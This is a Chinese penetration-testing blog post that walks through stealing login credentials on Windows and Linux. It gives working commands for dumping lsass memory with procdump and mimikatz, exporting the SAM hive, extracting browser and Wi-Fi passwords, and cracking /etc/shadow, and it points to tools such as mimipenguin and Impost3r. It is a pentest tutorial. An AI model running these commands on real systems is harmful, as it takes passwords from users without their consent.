凭证窃取的几种方式

最新推荐文章于 2024-07-14 20:00:30 发布
最新推荐文章于 2024-07-14 20:00:30 发布
阅读量1.1k 收藏 3
点赞数 2
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49821579/article/details/118888085
版权

0x01 Windows登录凭证窃取

Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。它们都是用户密码经过hash加密后的形式。

Windows系统下hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值。

例如:
Administrator:500:AF01DF70036EBACFAAD3B435B51404EE:44F077E27F6FEF69E7BD834C7242B040

用户名称为:Administrator
RID为:500
LM-HASH值为:AF01DF70036EBACFAAD3B435B51404EE
NTLM-HASH值为:44F077E27F6FEF69E7BD834C7242B040

1.从LSASS内存中读取

lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略。

要想读取内存的密码,前提是用户登陆过机器,登陆过就会在内存中停留:lsass.exe,一般在进程管理器中能看到,如下图(测试机器:windows server 2008):

image-20210718221756433

第一步,导出lsass.exe进程中的内容,使用工具:procdump(注:必须使用管理员权限),会在当前目录下产生一个 lsass.dmp 文件。

procdump.exe -accepteula -ma lsass.exe lsass.dmp

image-20210718215950623

第二步,通过mimikatz读取(08或者08以下的机器读取的直接是明文密码)

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

image-20210718222025579

PS:直接使用mimikatz读取也可以(当mimikatz无法在目标机器上运行时则用上面的方法)

#提升权限
privilege::debug

#抓取密码
sekurlsa::logonpasswords

2.从注册表中读取密码

注册表读取密码主要获取的是两个文件:

reg save HKLM\SYSTEM Sys.hiv
reg save HKLM\SAM Sam.hiv

image-20210718223708527

导出注册表之后,我们可以通过mimikatz读取管理员密码的hash值(如下图中的Hash NTLM):

mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv " exit> hiv.txt

image-20210718223905271

3.抓取浏览器保存密码

很多浏览器都提供了记住密码的功能,用户在登录一些网站的时候会选择记住密码。

使用工具LaZagne,可以提取浏览器所保存的密码

github项目地址:https://github.com/AlessandroZ/LaZagne

获取所有密码:
lazagne.exe all

4.查看电脑wifi密码

# 查看电脑连接过的所有wifi
netsh wlan show profiles
# 查看某一wifi的密码
netsh wlan show profiles name="xxx" key=clear
# CMD一键获取 所有连接过的WIFI密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear

image-20210718230750294

0x02 Linux登录凭证窃取

1.history记录敏感操作

Linux系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致敏感信息泄露。

image-20210718233918936

2.shadow文件破解

/etc/shadow中保存着用户的相关密码信息,如

# tail -n 1 /etc/shadow
test:$6$7uNh9hzdvpT3BRuB$ndF3AH.faJPvlgA.d57JOmFTLeQEuzgVFc.sYfI5VZDkOC6D78x9at.d8eTqRuTJsqjd6uboKmmYp75wbqE1e/:18825:0:99999:7:::

test用户的密码密文即为$6$7uNh9hzdvpT3BRuB$ndF3AH.faJPvlgA.d57JOmFTLeQEuzgVFc.sYfI5VZDkOC6D78x9at.d8eTqRuTJsqjd6uboKmmYp75wbqE1e/

可以通过John或hashcat等工具进行暴力破解获得明文。

image-20210717160033067

3.全局搜索敏感信息

全局搜索配置文件、脚本、数据库、日志文件是否有包含密码。

grep -rn "password=" /

4.mimipenguin抓取密码

一款Linux下的密码抓取神器,需要root权限运行,通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证,目前支持Kali、Ubnutu等操作系统。

github地址:

https://github.com/huntergregal/mimipenguin

5.Impost3r

一个利用C语言编写,用来窃取linux下各类密码(ssh,su,sudo)的工具。

github项目地址:

https://github.com/ph4ntonn/Impost3r

参考资料

[1] 内网渗透之各种密码凭证窃取 - 渗透红队笔记

[2] Linux下登录凭证窃取技巧

wawyw~
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
域内凭据窃取
G3et的博客
05-27 206
使用procdump获取密码副本,采用此方式可以解决mimikatz无法使用的问题,导出的dmp文件可在其他主机进行还原密码。本地认证中用来处理用户输入密码的进程为lsass.exe,密码会在这个进程中明文保存,供该进程将密码计算成NTLM Hash与sam进行比对。需要注意,windows server 2008及以前的版本在系统中存储的是明文密码,而在之后的版本默认导出的密码均为NTLM hash。转储了lsass进程,把内存dump出来的dmp文件可以通过本地mimikatz进行解密。
11--使用 mimikatz 提取 windows凭据密码
SunShine
06-28 4万+
mimikatz一.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://...
内网渗透 | 最全的内网凭据密码收集方法和技巧总结
Ms08067安全实验室
02-03 7317
内网凭据密码收集指南原创投稿作者:深蓝实验室天威战队前言在攻防场景下,红队人员拿下一台终端或服务器后,第一步要做的往往就是信息收集,为最大化利用权限,扩大战果,密码抓取必不可少,这里针对常见应用软件和系统等密码抓取做了记录和总结,希望能帮助你作为参考。RDP凭证本机RDP密码抓取本机RDP密码是一个我们常遇到的场景,通常使用mimikatz抓取RDP密码。当系统为win10或2012R2以上时,默...
凭据获取——windows单机凭据获取
最新发布
qq_55202378的博客
07-14 942
在windows中,SAM文件是windows用户的账户数据库,位于系统的目录中,所有本地用户的用户名、密码hash等信息都存储在这个文件中。用户输入密码登录时,用户输入的明文密码会被转化为hash,然后再与SAM文件中的hash值对比,若相同,则认证成功。lsass.exe是windows的一个系统进程,用于实现系统的安全机制,主要用于本地安全和登录策略。在通常情况下,用户输入密码登录后,登录的域名、用户名和登录凭据等信息会存储在lsass.exe的进程空间中,用户的明文密码经过WDigest和。
Linux系统下利用Impost3r劫持sudo命令窃取凭据
weixin_60274950的博客
07-01 1124
Impost3r是一款针对Linux平台的密码窃取工具,该工具采可以在linux系统的普通用户权限下制造水坑,从目标Linux主机中获取各类密码如ssh、su、sudo等。 软件使用 C 语言编写,可以在窃取密码后自动保存清理窃取痕迹,最大程度上让被攻击者无法察觉异常。...
基于AD Event日志检测LSASS凭证窃取攻击
11-30 640
01、简介 简单介绍一下,LSASS(本地安全机构子系统服务)在本地或域中登录Windows时,用户生成的各种凭证将会存储在LSASS进程的内存中,以便用户不必每次访问系统时重新登录。 攻击者在获得起始攻击点后,需要获取目标主机上的相关凭证,以便通过用户凭证进行横向移动,这个技术点最容易关联到的就是获取LSASS内存中保存的用户凭证。 一般LSASS窃取凭证有两种方式,第一种就是直接从LSASS...
IT安全:浅谈Windows凭据转储攻击
ITmoster的博客
01-29 352
通常情况下,网络攻击者并不需要使用高级手段入侵公司网络就可以在网络中隐藏。例如,他们会通过模仿合法用户的活动来掩饰自己的恶意操作,几乎不留下任何可疑痕迹。 攻击者将恶意行为与日常IT活动相结合,可避免暴露自己的身份,并在较长时间内不被发现。例如,大家通常想到的什么是最快和最常见的访问计算机的方式?很明显答案是登录,但值得注意的是,窃取和使用合法凭证来获取访问权限是攻击者最广泛使用的手段之一。 攻击者从服务器窃取用户凭据几种方式 除了典型的暴力破解攻击、网络钓鱼或肩膀冲浪密码攻击(它涉及从受害者的肩膀上偷看
WCE Windows hash抓取工具 教程
Polemo的博客
03-09 7083
WCE 下载地址:链接:https://share.weiyun.com/5MqXW47 密码:bdpqku 工具界面
行业分类-设备装置-一种统一凭证平台及其处理方法.zip
09-11
3. **安全性**:统一凭证平台需要有强大的加密技术,以保护凭证不被窃取或篡改。同时,也需要有防欺诈和反恶意攻击的策略。 4. **适应性**:平台应能适应各种不同类型的设备和网络环境,提供跨平台的兼容性。 5. *...
网络游戏-网络上的安全动态凭证分发.zip
09-20
网络游戏中的安全动态凭证分发通常基于以下几种机制: 1. **时间同步法**:此方法基于时间戳,动态口令每隔一段时间(如30秒)自动更新。用户设备和服务器端都有一个共享的秘密密钥,通过这个密钥和当前时间生成...
单点登录实现方式接口规范
01-26
单点登录(Single Sign-On,简称SSO)是一种网络访问控制机制,允许用户在一次登录后,无需再次认证即可访问多个相互信任的应用系统。在运营指挥系统中,单点登录的实现对于提升用户体验、增强安全性以及简化管理...
一种基于改进的HTTP摘要认证的SIP安全机制
10-22
在INVITE请求中,客户端通过UAC-Authenticate头域发起对服务器的挑战,服务器在401/407响应中用UAC-Authorization头域回应凭证,完成服务器身份验证。而密钥协商则是通过Encryption-Info头域提供公钥信息,客户端...
智能家居安全——身份劫持.pdf
09-11
设备交互主要包括广域网和局域网两种方式。厂商A仅支持广域网交互,而厂商B和C则同时支持广域网和局域网。在广域网交互中,应用通过服务器向智能设备发送指令,而设备之间则通过第三方云服务进行通信。这些交互方式...
Windows下登录凭证窃取技巧
10-09 4万+
拿到一台Windows服务器权限,收集各种登录凭证以便扩大战果。本篇分享几个窃取Windows登录凭证的技巧和工具。 1、Windows 本地密码Hash Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash,第二部分是NTLM-hash。Windows系统下hash密码格式用户名称:RID:LM-HASH值:NT-HASH值。 例如: Admin...
Linux登录凭证窃取二三
sash1mi
10-21 373
Linux登录凭证窃取二三 1、history命令记录敏感操作 Linux系统会自动把用户的操作命令记录到历史列表中,当用户在命令行中输入账号、密码进行登录时,将会导致历史敏感信息泄露。 2、mimipenguin抓取密码 github下载地址:https://github.com/huntergregal/mimipenguin Linux下的密码抓取神器,需要root权限运行,通过转储进程并提取很可能包含明文密码的行来利用内存中的明文凭证,目前支持Kali、Ubnutu等操作系统。 (没有显示密码
如何缓解Mimikatz WDigest Cleartext 窃取凭证
weixin_33816946的博客
09-19 226
本文讲的是如何缓解Mimikatz WDigest Cleartext 窃取凭证?,渗透测试人员和那些进行恶意攻击的人通常都会将注意力集中在使用最简单的攻击媒介来实现其目标。 比如已经存在几年的一个常见攻击方式—使用一个名为Mimikatz的工具,它能够从受损Windows系统的内存中窃取明文凭证。 受影响的系统 Windows 7和Windows S...
Windows密码凭证获取学习
crowsec
08-08 4609
一般来说,在我们获取到Windows的system权限之后,一般都喜欢去看下密码,哪怕是hash,也想尝试去解一下,Windows下的安全认证机制总共有两种,一种是基于NTLM的认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。...
查看Windows凭据和普通凭据密码(查看Windows中存储的密码)——mimikatz
热门推荐
一碗单炒饭的专栏
02-10 6万+
使用mimikatz进行Windows中存储的密码查看 查看Windows为你管理的凭据 路径:控制面板\所有控制面板项\凭据管理器 软件下载 https://github.com/gentilkiwi/mimikatz/releases 下载完成后,以管理员方式运行mimikatz 查看Windows凭据 输入下方两个指令(#号后面的) mimikatz # privilege::debug...
无线网络面临的安全威胁
04-29
无线网络面临的安全威胁主要包括以下几种: 1. 窃听:黑客可以通过监听无线网络中的数据包来窃取敏感信息,例如登录凭证、信用卡信息等。 2. 伪造:黑客可以通过伪造无线网络的身份来欺骗用户,例如通过假冒公共Wi-Fi热点来窃取用户信息。 3. 拒绝服务攻击(DoS):黑客可以通过向无线网络发送大量请求来使其崩溃,从而影响网络的可用性。 4. 恶意软件:黑客可以通过无线网络传播恶意软件,例如病毒、木马等,危害用户设备的安全。 5. 中间人攻击:黑客可以通过伪造无线网络中的数据流量来篡改信息或者窃取敏感信息。 6. 身份伪造:黑客可以通过伪造无线网络中的身份来获取用户权限,例如通过伪造路由器身份来获得管理员权限。 为了保障无线网络的安全,我们需要采取一系列措施,例如加密数据传输、限制访问、检测恶意软件等。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值